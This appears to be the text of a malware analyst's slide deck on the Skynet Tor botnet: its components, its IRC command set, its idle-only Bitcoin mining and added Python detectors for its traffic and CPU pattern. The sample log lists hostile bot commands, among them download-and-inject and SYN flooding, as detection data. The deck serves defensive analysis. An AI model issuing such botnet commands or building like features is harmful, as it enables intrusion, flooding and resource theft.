2. The content I show here is for educational purposes only. I am not
responsible for your actions. The views/ideas/knowledge expressed here
are solely my own and have nothing to do with the company or
organization for which I currently work.
3. Srinu K
• Working as a malware analyst at Online Guards
• 2+ years of experience working with malware
• Seasoned penetration tester and forensic investigator
• LinkedIn: http://in.linkedin.com/pub/srinu-neo/39/806/712
4. Size: ~15 MB
Skynet is bundled with 4 main components:
1. Tor client for Windows
2. Zeus bot
3. CGMiner
4. OpenCL.dll
5. Spreading: via Usenet downloads
Capabilities:
1. Tor communication
2. Credential grabbing
3. DDoS
4. IRC
5. Bitcoin mining
12. Feature Commands
Get information on the compromised computer: !info, !version, !hardware, !idle
Download and execute files: !download
Download a binary to memory and inject it into other processes: !download.mem
Visit a webpage: !visit, !visit.post
SYN and UDP flooding: !syn, !syn.stop, !udp, !udp.stop
Slowloris flooding: !slowloris, !slowloris.stop
HTTP flooding: !http.bwrape, !http.bwrape.stop
Open a SOCKS proxy: !socks
Retrieve the .onion address of the Hidden Service opened on the compromised computer: !ip
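The command set above is the kind of thing a network defender wants to spot in captured IRC traffic. The following is an added detection example, not code from the original deck or from the Skynet sample: it parses IRC PRIVMSG lines, maps the bot commands listed on the slide to a feature category, and groups the hits. The IRC lines, nicks, channel name, IP and URL in SAMPLE_LOG are constructed for the example.

```python
"""Classify Skynet-style bot commands observed in IRC traffic.

Added example for detection; the command names come from the slide, the
category labels and all sample log lines below are constructed.
"""
import re

# Command -> feature category, following the grouping on the slide.
COMMAND_CATEGORIES = {
    "!info": "recon", "!version": "recon", "!hardware": "recon", "!idle": "recon",
    "!download": "dropper", "!download.mem": "dropper",
    "!visit": "web", "!visit.post": "web",
    "!syn": "ddos", "!syn.stop": "ddos", "!udp": "ddos", "!udp.stop": "ddos",
    "!slowloris": "ddos", "!slowloris.stop": "ddos",
    "!http.bwrape": "ddos", "!http.bwrape.stop": "ddos",
    "!socks": "proxy",
    "!ip": "tor_hidden_service",
}

# IRC PRIVMSG wire format: ":nick!user@host PRIVMSG target :text"
PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)\S* PRIVMSG (?P<target>\S+) :(?P<text>.*)$"
)


def parse_command(line):
    """Return a dict describing a known bot command in one IRC line, else None.

    Lines that are not PRIVMSGs, or whose text is not a known '!' command,
    are ignored so ordinary channel chatter does not produce noise.
    """
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    text = m.group("text").strip()
    if not text.startswith("!"):
        return None
    parts = text.split()
    cmd = parts[0].lower()
    category = COMMAND_CATEGORIES.get(cmd)
    if category is None:
        return None
    return {
        "nick": m.group("nick"),
        "target": m.group("target"),
        "command": cmd,
        "args": parts[1:],
        "category": category,
    }


def classify_log(lines):
    """Group every recognised bot command by category: {category: [events]}."""
    grouped = {}
    for line in lines:
        event = parse_command(line)
        if event is not None:
            grouped.setdefault(event["category"], []).append(event)
    return grouped


# Constructed sample capture (documentation IP range, invalid TLD for the URL).
SAMPLE_LOG = [
    ":ctrl!c@x.onion PRIVMSG #skynet :!info",
    ":ctrl!c@x.onion PRIVMSG #skynet :!syn 203.0.113.5 80",
    ":ctrl!c@x.onion PRIVMSG #skynet :!download.mem http://example.invalid/upd.bin",
    ":bot42!b@y PRIVMSG ctrl :hello",
    ":ctrl!c@x.onion PRIVMSG #skynet :!syn.stop",
    ":ctrl!c@x.onion PRIVMSG #skynet :!ip",
    "PING :server",
]

if __name__ == "__main__":
    for category, events in sorted(classify_log(SAMPLE_LOG).items()):
        print(category, [e["command"] for e in events])
```

The category labels make it easy to raise the severity of an alert for the ddos and dropper groups while logging recon commands at a lower level; the regex deliberately keys on the IRC framing rather than on the nick, since the controller's nick is attacker-chosen.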
14. The bot only mines if the computer has been unused for 2 minutes, and
it stops mining immediately when the owner returns. To detect user activity,
Skynet installs WH_MOUSE and WH_KEYBOARD hook procedures that monitor the
system for keystrokes and mouse movements.
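The idle-only mining behaviour described above is itself a detectable signature: a process whose CPU use jumps only after the user has been idle for the 2-minute window and drops the moment input resumes. The following is an added example, not code from the original deck: it runs that correlation over constructed endpoint telemetry (one sample every 30 s with seconds-since-last-input and per-process CPU percentage, as an EDR or performance-counter collector might export). The process names, CPU values and the 50 % busy threshold are assumptions for the example.

```python
"""Flag processes whose CPU use tracks user idleness.

Added example, not from the original slides. SAMPLES is constructed
telemetry: 'idle_s' is seconds since the last keyboard/mouse event and
'cpu' maps process name -> CPU percent at that sample.
"""

IDLE_THRESHOLD_S = 120   # from the slide: mining starts after 2 minutes unused
BUSY_CPU_PCT = 50.0      # assumed threshold for "this process is working hard"


def find_idle_correlated_processes(samples, idle_threshold=IDLE_THRESHOLD_S,
                                   busy_cpu=BUSY_CPU_PCT):
    """Return names of processes that are busy only while the user is idle.

    A process is reported when every sample taken with idle_s >= idle_threshold
    shows it at or above busy_cpu, and every sample with the user active shows
    it below. Always-busy processes (a legitimate render or build job) and
    never-busy ones are not reported, so the rule keys on the correlation
    rather than on raw CPU consumption.
    """
    idle_counts = {}     # name -> [busy samples, total samples] while user idle
    active_counts = {}   # same, while user active
    for sample in samples:
        bucket = idle_counts if sample["idle_s"] >= idle_threshold else active_counts
        for name, cpu in sample["cpu"].items():
            counts = bucket.setdefault(name, [0, 0])
            counts[0] += int(cpu >= busy_cpu)
            counts[1] += 1

    flagged = []
    for name, (idle_busy, idle_total) in idle_counts.items():
        if idle_total == 0 or idle_busy != idle_total:
            continue                      # not consistently busy while idle
        active_busy, active_total = active_counts.get(name, (0, 0))
        if active_total > 0 and active_busy == 0:
            flagged.append(name)          # busy when idle, quiet when active
    return sorted(flagged)


# Constructed telemetry: the user walks away at t=0 and returns at t=180.
SAMPLES = [
    {"t": 0,   "idle_s": 0,   "cpu": {"unknown.exe": 1,  "render.exe": 90, "word.exe": 5}},
    {"t": 30,  "idle_s": 30,  "cpu": {"unknown.exe": 1,  "render.exe": 90, "word.exe": 5}},
    {"t": 60,  "idle_s": 60,  "cpu": {"unknown.exe": 1,  "render.exe": 90, "word.exe": 5}},
    {"t": 90,  "idle_s": 90,  "cpu": {"unknown.exe": 1,  "render.exe": 90, "word.exe": 5}},
    {"t": 120, "idle_s": 120, "cpu": {"unknown.exe": 95, "render.exe": 90, "word.exe": 5}},
    {"t": 150, "idle_s": 150, "cpu": {"unknown.exe": 97, "render.exe": 90, "word.exe": 5}},
    {"t": 180, "idle_s": 0,   "cpu": {"unknown.exe": 2,  "render.exe": 90, "word.exe": 5}},
]

if __name__ == "__main__":
    print("idle-correlated CPU consumers:", find_idle_correlated_processes(SAMPLES))
```

In a real deployment the idle_s field would come from the OS (for example the time since the last input event as reported by the endpoint agent) and the window would be tuned to the observed behaviour; the point is that a miner gated on user absence produces a CPU profile that is the inverse of interactive software.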
15. Another Tor-based botnet is "Atrax". In the future we will likely see
more botnets adopt Tor as a communication channel.